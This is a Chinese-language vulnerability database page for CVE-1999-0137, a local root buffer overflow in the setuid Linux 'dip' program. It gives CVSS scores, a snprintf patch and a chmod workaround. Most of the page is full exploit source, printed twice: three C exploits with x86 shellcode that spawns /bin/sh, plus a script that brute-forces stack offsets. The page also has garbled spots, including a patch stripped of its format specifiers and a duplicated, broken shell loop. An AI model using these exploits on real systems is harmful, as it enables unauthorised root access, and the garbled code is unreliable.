CVE-1999-0137
CVSS7.2
发布时间 :1996-07-09 00:00:00
修订时间 :2008-09-09 08:33:49
NMCOES    

[原文]The dip program on many Linux systems allows local users to gain root access via a buffer overflow.


[CNNVD]多厂商dip缓冲区溢出漏洞(CNNVD-199607-003)

        许多版本的Linux平台的dip程序存在漏洞。本地用户可以借助缓冲区溢出漏洞获取根访问权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0137
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0137
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199607-003
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

多厂商dip缓冲区溢出漏洞
高危 缓冲区溢出
1996-07-09 00:00:00 2005-05-02 00:00:00
本地  
        许多版本的Linux平台的dip程序存在漏洞。本地用户可以借助缓冲区溢出漏洞获取根访问权限。

- 公告与补丁

        Apply this patch:
        --- main.c Tue Feb 13 03:03:35 1996
        +++ main.c Mon May 4 23:36:49 1998
        @@ -189,7 +189,7 @@
         return;
         }
        - sprintf(buf, "/LCK..", _PATH_LOCKD, nam);
        + snprintf(buf, sizeof(buf), "/LCK..", _PATH_LOCKD, nam);
         fp = fopen(buf, "r");
         if (fp == (FILE *)0) {
        Or chmod -s dip.

- 漏洞信息 (19077)

Fred N. van Kempen dip 3.3.7 Buffer Overflow Vulnerability (1) (EDBID:19077)
linux local
1998-05-05 Verified
0 jamez
source: http://www.securityfocus.com/bid/86/info

A buffer overflow resides in 'dip-3.3.7o' and derived programs. This is a problem only on systems where 'dip' is installed setuid. The culpable code is an 'sprintf()' in line 192 in 'main.c': 

sprintf(buf, "%s/LCK..%s", _PATH_LOCKD, nam);

----- dip-exp.c ----- 
/* 
dip 3.3.7o buffer overflow exploit for Linux. (May 7, 1998) 
coded by jamez. e-mail: jamez@uground.org 

thanks to all ppl from uground. 

usage: 
gcc -o dip-exp dip3.3.7o-exp.c 
./dip-exp offset (-100 to 100. probably 0. tested on slack 3.4) 
*/ 


/* x86 Linux machine-code payload (the "\xcd\x80" bytes are int 0x80 system
 * calls); the trailing "/bin/sh" is the program name it carries.  The bytes
 * are left verbatim — this listing is documented, not altered. */
char shellcode[] = 

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 
"\x80\xe8\xdc\xff\xff\xff/bin/sh"; 


/* Length of the string main() hands to dip as its -l argument.  The author's
 * note below explains the absence of a NOP sled. */
#define SIZE 130 
/* cause it's a little buffer, i wont use NOP's */ 

/* File-scope (zero-initialised) staging buffer filled by main(). */
char buffer[SIZE]; 


/* Approximates the stack pointer at the call site on i386: the inline asm
 * leaves %esp in %eax and the function has no return statement, relying on
 * the i386 convention that the return value is whatever is in eax.  Falling
 * off the end of a non-void function whose value is used is undefined
 * behaviour in standard C. */
unsigned long get_esp(void) { 
__asm__("movl %esp,%eax"); 
} 


/* Entry point.  argv[1] (optional) is an integer offset applied to the
 * address derived from get_esp().  Review notes: `void main` is not a
 * standard signature, and atoi()/strlen()/execl() are called with no
 * #include anywhere in this listing (implicit declarations, invalid since
 * C99). */
void main(int argc, char * argv[]) 
{ 
int i = 0, 
offset = 0; 
long addr; 


/* atoi() performs no validation; a non-numeric argument yields 0. */
if(argc > 1) offset = atoi(argv[1]); 

/* 0xcb is the author's empirically chosen constant (header: "tested on
 * slack 3.4"). */
addr = get_esp() - offset - 0xcb; 

/* Copy the payload bytes (excluding the terminating NUL) to the front. */
for(i = 0; i < strlen(shellcode); i++) 
buffer[i] = shellcode[i]; 

/* Fill the remainder with addr, low byte first (little-endian), 4 bytes per
 * step.  With the 45-byte payload above i reaches 129 on the last step, so
 * the body writes indices 129..132 — three bytes past the 130-byte global
 * (out-of-bounds write, undefined behaviour). */
for (; i < SIZE; i += 4) 
{ 
buffer[i ] = addr & 0x000000ff; 
buffer[i+1] = (addr & 0x0000ff00) >> 8; 
buffer[i+2] = (addr & 0x00ff0000) >> 16; 
buffer[i+3] = (addr & 0xff000000) >> 24; 
} 

/* Make buffer a NUL-terminated string for execl(). */
buffer[SIZE - 1] = 0; 

/* Run dip with buffer as the -l argument; presumably that value reaches the
 * `nam` operand of the unbounded sprintf() quoted in the advisory (not
 * verifiable from this listing).  The overflow only matters when dip is
 * setuid root — the snprintf() patch or `chmod -s dip` removes it.  If
 * execl() fails nothing is reported and main simply returns. */
execl("/sbin/dip", "dip", "-k", "-l", buffer, (char *)0); 
} 
----- cut here ----- 

Another exploit: 

------------------------------ dipr.c ----------------------------- 

/* 
* dip-3.3.7o buffer overrun 07 May 1998 
* 
* syntax: ./dipr <offset> 
* 
* 
* offset: try increments of 50 between 1500 and 3000 
* 
* tested in linux with dip version 3.3.7o (slak 3.4). 
* 
* by zef and r00t @promisc.net 
* 
* http://www.promisc.net 
*/ 

#include <stdio.h> 
#include <stdlib.h> 

/* Approximates the stack pointer at the call site on i386: the asm leaves
 * %esp in %eax and there is no return statement, so the result depends on
 * the i386 return-in-eax convention (undefined behaviour in standard C).
 * The declaration has an implicit int return type, which C99 removed. */
static inline getesp() 
{ 
__asm__(" movl %esp,%eax "); 
} 

/* Entry point.  argv[1] is the offset added to getesp(); it is read without
 * checking argc, so running with no argument dereferences a null pointer.
 * Review notes: implicit int return type for main (invalid since C99);
 * strcpy()/execve() are used without <string.h>/<unistd.h>. */
main(int argc, char **argv) 
{ 
int jump,i,n; 
unsigned long xaddr; 
char *cmd[5], buf[4096]; 


/* Same x86 Linux payload as dip-exp.c above; carries "/bin/sh". */
char code[] = 
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 
"\x80\xe8\xdc\xff\xff\xff/bin/sh"; 

/* atoi() performs no validation; a non-numeric argument yields 0. */
jump=atoi(argv[1]); 

/* buf[0..67]: filler bytes 0x41 ('A'). */
for (i=0;i<68;i++) 
buf[i]=0x41; 

/* buf[68..112]: the payload (45 iterations); i equals 113 afterwards. */
for (n=0,i=68;i<113;i++) 
buf[i]=code[n++]; 

xaddr=getesp()+jump; 

/* buf[113..116]: xaddr, low byte first (little-endian). */
buf[i]=xaddr & 0xff; 
buf[i+1]=(xaddr >> 8) & 0xff; 
buf[i+2]=(xaddr >> 16) & 0xff; 
buf[i+3]=(xaddr >> 24) & 0xff; 

/* buf[117..120]: a second copy.  The buf[i+6] store appears twice (the
 * repeat is redundant, not harmful).  Nothing beyond index 120 is written
 * and no NUL is ever stored, so unless a byte of xaddr happens to be zero
 * the string execve() receives runs on into uninitialised automatic
 * storage — undefined behaviour. */
buf[i+4]=xaddr & 0xff; 
buf[i+5]=(xaddr >> 8) & 0xff; 
buf[i+6]=(xaddr >> 16) & 0xff; 
buf[i+6]=(xaddr >> 16) & 0xff; 
buf[i+7]=(xaddr >> 24) & 0xff; 

/* argv for the target process; malloc() results are not checked before
 * strcpy() writes through them. */
cmd[0]=malloc(17); 
strcpy(cmd[0],"/sbin/dip-3.3.7o"); 

cmd[1]=malloc(3); 
strcpy(cmd[1],"-k"); 

cmd[2]=malloc(3); 
strcpy(cmd[2],"-l"); 

cmd[3]=buf; 

cmd[4]=NULL; 

/* Run the versioned dip binary with buf as its -l argument and an empty
 * environment.  Only a setuid dip is affected; the advisory's snprintf()
 * patch or `chmod -s` closes the hole.  A failed execve() is not reported. */
execve(cmd[0],cmd,NULL); 
} 

------------------------------- end ------------------------------- 


Shell script for easy testing :-) 


---------------------------- dipr.test ---------------------------- 

#/bin/bash 
# NOTE(review): the line above lacks the "!" of a shebang, so it is an
# ordinary comment; the script only runs under bash when invoked explicitly
# (e.g. `bash dipr.test`).
# Preconditions checked below: the target binary exists and is setuid (-u),
# and ./dipr has been compiled.  `exit -1` is not a valid exit status; bash
# reports it as 255.
if [ ! -x /sbin/dip-3.3.7o ] 
then 
echo "could not find file \"/sbin/dip-3.3.7o\""; 
exit -1 
fi 
if [ ! -u /sbin/dip-3.3.7o ] 
then 
echo "dip executable is not suid" 
exit -1 
fi 
if [ ! -x ./dipr ] 
then 
echo "could not find file \"./dipr\""; 
echo "try compiling dipr.c" 
exit -1 
fi 

x=2000 
false 
# NOTE(review): from this `while` down to the second `x=2000` the text
# repeats the checks above and leaves the `while` without do/done — this
# looks like a paste/extraction artifact in the advisory; the script is not
# runnable as printed.
while [ $x -lt 3000 -a $? -ne 0 ] 
fi 
if [ ! -u /sbin/dip-3.3.7o ] 
then 
echo "dip executable is not suid" 
exit -1 
fi 
if [ ! -x ./dipr ] 
then 
echo "could not find file \"./dipr\""; 
echo "try compiling dipr.c" 
exit -1 
fi 

x=2000 
# `false` seeds $? with a non-zero status so the loop condition holds on
# entry; on later iterations $? is the exit status of the last ./dipr run.
false 
# Loop until a run exits 0 or x reaches 3000.  x is incremented before the
# run, so the first attempt uses 2050, not 2000.  `$[...]` is deprecated
# arithmetic syntax; `$((...))` is the standard form.
while [ $x -lt 3000 -a $? -ne 0 ] 
do 
echo offset=$x 
x=$[x+50] 
./dipr $x 
done 
# Presumably discards core files left by crashed attempts.
rm -f core 

- 漏洞信息 (19078)

Fred N. van Kempen dip 3.3.7 Buffer Overflow Vulnerability (2) (EDBID:19078)
linux local
1998-05-05 Verified
0 pr10n
source: http://www.securityfocus.com/bid/86/info

A buffer overflow resides in 'dip-3.3.7o' and derived programs. This is a problem only on systems where 'dip' is installed setuid. The culpable code is an 'sprintf()' in line 192 in 'main.c': 

sprintf(buf, "%s/LCK..%s", _PATH_LOCKD, nam);

/* Linux x86 dip 3.3.7p exploit by pr10n */


#include <stdio.h>

/* x86 one-byte no-op, used by main() as filler in front of the payload. */
#define NOP 0x90


/*thanks to hack.co.za*/
/* x86 Linux machine-code payload ("\xcd\x80" = int 0x80 system calls); the
 * trailing "/bin/sh" is the program name it carries.  Left verbatim. */
char shellcode[] =
          "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
          "\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
          "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
          "\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";



/* Approximates the stack pointer at the call site on i386: the asm leaves
 * %esp in %eax and there is no return statement (relies on the return-in-eax
 * convention; undefined behaviour in standard C). */
unsigned long get_sp(void){ __asm__("movl %esp, %eax");}

/* Entry point: argv[1] is the offset subtracted from get_sp().  Review
 * notes: implicit int return type for main; exit()/atoi()/strlen()/memcpy()/
 * execl() are used with only <stdio.h> included (implicit declarations,
 * invalid since C99); `ptr` is declared but never used. */
main(int argc, char *argv[]){

char buf[136];
int i;
int offset=0,*ptr;
long ret;


if(argc!=2){
printf("usage: %s offset\n",argv[0]);
exit(0);}

/* atoi() performs no validation; a non-numeric argument yields 0. */
offset=atoi(argv[1]);

ret=(get_sp()-offset);

/* Store ret at every 4th index starting from 1.  This assumes
 * sizeof(long) == 4 (the i386 target named in the header; on LP64 each
 * store is 8 bytes).  The last step (i = 133) writes indices 133..136, one
 * byte past the 136-byte array, and the cast makes an unaligned access —
 * both undefined behaviour. */
for(i=1;i<136;i+=4){
*(long *)&buf[i]=ret;}

/* %x expects unsigned int but ret is long — mismatched format specifier. */
printf("\nusing: 0x%x\n\n",ret);

/* NOP filler in front of the payload; count = sizeof(buf) - strlen - 40. */
for(i=0;i<(sizeof(buf)-strlen(shellcode)-40);i++)
buf[i]=NOP;

/* Payload follows the filler; the tail of buf still holds copies of ret.
 * No NUL is ever stored, so execl() reads past the end of buf unless a
 * byte of ret happens to be zero. */
memcpy(buf+i,shellcode,strlen(shellcode));

/* Run dip with buf as the -l argument; presumably that value reaches the
 * unbounded sprintf() quoted in the advisory.  Only a setuid dip is
 * affected; the snprintf() patch or `chmod 755 /usr/sbin/dip` closes it.
 * A failed execl() is not reported. */
execl("/usr/sbin/dip","dip","-k","-l",buf,(char *)0);

}

- 漏洞信息

900
Multiple Unix Vendor dip Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Workaround
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

1996-01-21 Unknown
1996-01-21 Unknown

- 解决方案

Currently, there are no known upgrades or patches to correct this vulnerability. It is possible to temporarily work around the flaw by implementing the following workaround: chmod 755 /usr/sbin/dip.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor dip Buffer Overflow Vulnerability
Boundary Condition Error 86
No Yes
1998-05-05 12:00:00 2007-07-09 08:57:00
This vulnerability was made public by Goran Gajic <ggajic@afrodita.rcub.bg.ac.yu> on Tuesday, May 5 1998, to the BugTraq mailing list.

- 受影响的程序版本

Fred N. van Kempen dip 3.3.7 o
+ Fred N. van Kempen dip 3.3.7 o-uri
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.3
+ S.u.S.E. Linux 6.2
+ Slackware Linux 3.4

- 漏洞讨论

A buffer overflow resides in 'dip-3.3.7o' and derived programs. This is a problem only on systems where 'dip' is installed setuid. The culpable code is an 'sprintf()' in line 192 in 'main.c':

sprintf(buf, "%s/LCK..%s", _PATH_LOCKD, nam);

- 漏洞利用

The following exploit code is available:

----- dip-exp.c -----
/*
dip 3.3.7o buffer overflow exploit for Linux. (May 7, 1998)
coded by jamez. e-mail: jamez@uground.org

thanks to all ppl from uground.

usage:
gcc -o dip-exp dip3.3.7o-exp.c
./dip-exp offset (-100 to 100. probably 0. tested on slack 3.4)
*/


/* x86 Linux machine-code payload (the "\xcd\x80" bytes are int 0x80 system
 * calls); the trailing "/bin/sh" is the program name it carries.  The bytes
 * are left verbatim — this listing is documented, not altered. */
char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";


/* Length of the string main() hands to dip as its -l argument.  The author's
 * note below explains the absence of a NOP sled. */
#define SIZE 130
/* cause it's a little buffer, i wont use NOP's */

/* File-scope (zero-initialised) staging buffer filled by main(). */
char buffer[SIZE];


/* Approximates the stack pointer at the call site on i386: the inline asm
 * leaves %esp in %eax and the function has no return statement, relying on
 * the i386 convention that the return value is whatever is in eax.  Falling
 * off the end of a non-void function whose value is used is undefined
 * behaviour in standard C. */
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}


/* Entry point.  argv[1] (optional) is an integer offset applied to the
 * address derived from get_esp().  Review notes: `void main` is not a
 * standard signature, and atoi()/strlen()/execl() are called with no
 * #include anywhere in this listing (implicit declarations, invalid since
 * C99). */
void main(int argc, char * argv[])
{
int i = 0,
offset = 0;
long addr;


/* atoi() performs no validation; a non-numeric argument yields 0. */
if(argc > 1) offset = atoi(argv[1]);

/* 0xcb is the author's empirically chosen constant (header: "tested on
 * slack 3.4"). */
addr = get_esp() - offset - 0xcb;

/* Copy the payload bytes (excluding the terminating NUL) to the front. */
for(i = 0; i < strlen(shellcode); i++)
buffer[i] = shellcode[i];

/* Fill the remainder with addr, low byte first (little-endian), 4 bytes per
 * step.  With the 45-byte payload above i reaches 129 on the last step, so
 * the body writes indices 129..132 — three bytes past the 130-byte global
 * (out-of-bounds write, undefined behaviour). */
for (; i < SIZE; i += 4)
{
buffer[i ] = addr & 0x000000ff;
buffer[i+1] = (addr & 0x0000ff00) >> 8;
buffer[i+2] = (addr & 0x00ff0000) >> 16;
buffer[i+3] = (addr & 0xff000000) >> 24;
}

/* Make buffer a NUL-terminated string for execl(). */
buffer[SIZE - 1] = 0;

/* Run dip with buffer as the -l argument; presumably that value reaches the
 * `nam` operand of the unbounded sprintf() quoted in the advisory (not
 * verifiable from this listing).  The overflow only matters when dip is
 * setuid root — the snprintf() patch or `chmod -s dip` removes it.  If
 * execl() fails nothing is reported and main simply returns. */
execl("/sbin/dip", "dip", "-k", "-l", buffer, (char *)0);
}
----- cut here -----

Another exploit:

------------------------------ dipr.c -----------------------------

/*
* dip-3.3.7o buffer overrun 07 May 1998
*
* syntax: ./dipr <offset>
*
*
* offset: try increments of 50 between 1500 and 3000
*
* tested in linux with dip version 3.3.7o (slak 3.4).
*
* by zef and r00t @promisc.net
*
* http://www.promisc.net
*/

#include <stdio.h>
#include <stdlib.h>

/* Approximates the stack pointer at the call site on i386: the asm leaves
 * %esp in %eax and there is no return statement, so the result depends on
 * the i386 return-in-eax convention (undefined behaviour in standard C).
 * The declaration has an implicit int return type, which C99 removed. */
static inline getesp()
{
__asm__(" movl %esp,%eax ");
}

/* Entry point.  argv[1] is the offset added to getesp(); it is read without
 * checking argc, so running with no argument dereferences a null pointer.
 * Review notes: implicit int return type for main (invalid since C99);
 * strcpy()/execve() are used without <string.h>/<unistd.h>. */
main(int argc, char **argv)
{
int jump,i,n;
unsigned long xaddr;
char *cmd[5], buf[4096];


/* Same x86 Linux payload as dip-exp.c above; carries "/bin/sh". */
char code[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* atoi() performs no validation; a non-numeric argument yields 0. */
jump=atoi(argv[1]);

/* buf[0..67]: filler bytes 0x41 ('A'). */
for (i=0;i<68;i++)
buf[i]=0x41;

/* buf[68..112]: the payload (45 iterations); i equals 113 afterwards. */
for (n=0,i=68;i<113;i++)
buf[i]=code[n++];

xaddr=getesp()+jump;

/* buf[113..116]: xaddr, low byte first (little-endian). */
buf[i]=xaddr & 0xff;
buf[i+1]=(xaddr >> 8) & 0xff;
buf[i+2]=(xaddr >> 16) & 0xff;
buf[i+3]=(xaddr >> 24) & 0xff;

/* buf[117..120]: a second copy.  The buf[i+6] store appears twice (the
 * repeat is redundant, not harmful).  Nothing beyond index 120 is written
 * and no NUL is ever stored, so unless a byte of xaddr happens to be zero
 * the string execve() receives runs on into uninitialised automatic
 * storage — undefined behaviour. */
buf[i+4]=xaddr & 0xff;
buf[i+5]=(xaddr >> 8) & 0xff;
buf[i+6]=(xaddr >> 16) & 0xff;
buf[i+6]=(xaddr >> 16) & 0xff;
buf[i+7]=(xaddr >> 24) & 0xff;

/* argv for the target process; malloc() results are not checked before
 * strcpy() writes through them. */
cmd[0]=malloc(17);
strcpy(cmd[0],"/sbin/dip-3.3.7o");

cmd[1]=malloc(3);
strcpy(cmd[1],"-k");

cmd[2]=malloc(3);
strcpy(cmd[2],"-l");

cmd[3]=buf;

cmd[4]=NULL;

/* Run the versioned dip binary with buf as its -l argument and an empty
 * environment.  Only a setuid dip is affected; the advisory's snprintf()
 * patch or `chmod -s` closes the hole.  A failed execve() is not reported. */
execve(cmd[0],cmd,NULL);
}

------------------------------- end -------------------------------


Shell script for easy testing :-)


---------------------------- dipr.test ----------------------------

#/bin/bash
# NOTE(review): the line above lacks the "!" of a shebang, so it is an
# ordinary comment; the script only runs under bash when invoked explicitly
# (e.g. `bash dipr.test`).
# Preconditions checked below: the target binary exists and is setuid (-u),
# and ./dipr has been compiled.  `exit -1` is not a valid exit status; bash
# reports it as 255.
if [ ! -x /sbin/dip-3.3.7o ]
then
echo "could not find file \"/sbin/dip-3.3.7o\"";
exit -1
fi
if [ ! -u /sbin/dip-3.3.7o ]
then
echo "dip executable is not suid"
exit -1
fi
if [ ! -x ./dipr ]
then
echo "could not find file \"./dipr\"";
echo "try compiling dipr.c"
exit -1
fi

x=2000
false
# NOTE(review): from this `while` down to the second `x=2000` the text
# repeats the checks above and leaves the `while` without do/done — this
# looks like a paste/extraction artifact in the advisory; the script is not
# runnable as printed.
while [ $x -lt 3000 -a $? -ne 0 ]
fi
if [ ! -u /sbin/dip-3.3.7o ]
then
echo "dip executable is not suid"
exit -1
fi
if [ ! -x ./dipr ]
then
echo "could not find file \"./dipr\"";
echo "try compiling dipr.c"
exit -1
fi

x=2000
# `false` seeds $? with a non-zero status so the loop condition holds on
# entry; on later iterations $? is the exit status of the last ./dipr run.
false
# Loop until a run exits 0 or x reaches 3000.  x is incremented before the
# run, so the first attempt uses 2050, not 2000.  `$[...]` is deprecated
# arithmetic syntax; `$((...))` is the standard form.
while [ $x -lt 3000 -a $? -ne 0 ]
do
echo offset=$x
x=$[x+50]
./dipr $x
done
# Presumably discards core files left by crashed attempts.
rm -f core

------------------------------- end -------------------------------

- 解决方案

Apply this patch:

--- main.c Tue Feb 13 03:03:35 1996
+++ main.c Mon May 4 23:36:49 1998
@@ -189,7 +189,7 @@
return;
}

- sprintf(buf, "%s/LCK..%s", _PATH_LOCKD, nam);
+ snprintf(buf, sizeof(buf), "%s/LCK..%s", _PATH_LOCKD, nam);

fp = fopen(buf, "r");
if (fp == (FILE *)0) {

Or chmod -s dip.

- 相关参考

 

 
